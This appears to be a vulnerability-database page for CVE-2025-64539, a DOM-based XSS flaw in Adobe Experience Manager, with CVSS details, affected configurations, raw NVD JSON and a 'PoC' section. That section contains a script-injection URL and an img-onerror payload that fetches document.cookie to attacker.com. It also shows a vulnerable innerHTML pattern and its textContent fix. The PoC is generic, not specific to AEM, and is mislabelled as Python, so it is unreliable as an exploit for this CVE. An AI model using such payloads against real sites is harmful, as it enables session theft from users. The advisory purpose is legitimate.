Security Vulnerability Report
中文
CVE-2025-64539 CVSS 9.3 CRITICAL

CVE-2025-64539

Published: 2025-12-10 19:16:15
Last Modified: 2025-12-12 19:58:14

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x所有版本受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64539 DOM-based XSS PoC for Adobe Experience Manager // This PoC demonstrates the DOM XSS vulnerability in AEM // Malicious URL construction const maliciousPayload = '<script>alert(document.cookie)</script>'; const baseUrl = 'https://vulnerable-aem-instance.com/content/page.html'; const pocUrl = `${baseUrl}?param=${encodeURIComponent(maliciousPayload)}`; console.log('CVE-2025-64539 PoC URL:'); console.log(pocUrl); // Simulated vulnerable code pattern (what attackers exploit) function vulnerableCode() { // VULNERABLE: Direct use of URL parameter without sanitization const userInput = new URLSearchParams(window.location.search).get('param'); // VULNERABLE: Using innerHTML to insert user data document.getElementById('output').innerHTML = userInput; // This causes the injected script to execute } // Safe code pattern (recommended fix) function safeCode() { const userInput = new URLSearchParams(window.location.search).get('param'); // SAFE: Using textContent instead of innerHTML document.getElementById('output').textContent = userInput; // Or properly encode before insertion const safeHtml = userInput .replace(/&/g, '&amp;') .replace(/</g, '&lt;') .replace(/>/g, '&gt;') .replace(/"/g, '&quot;') .replace(/'/g, '&#x27;'); // Then use safe DOM methods } // Attack scenario: Session hijacking const sessionHijackPayload = ` <img src=x onerror=" fetch('https://attacker.com/steal?cookie=' + document.cookie) "> `;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64539", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:15.310", "lastModified": "2025-12-12T19:58:13.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}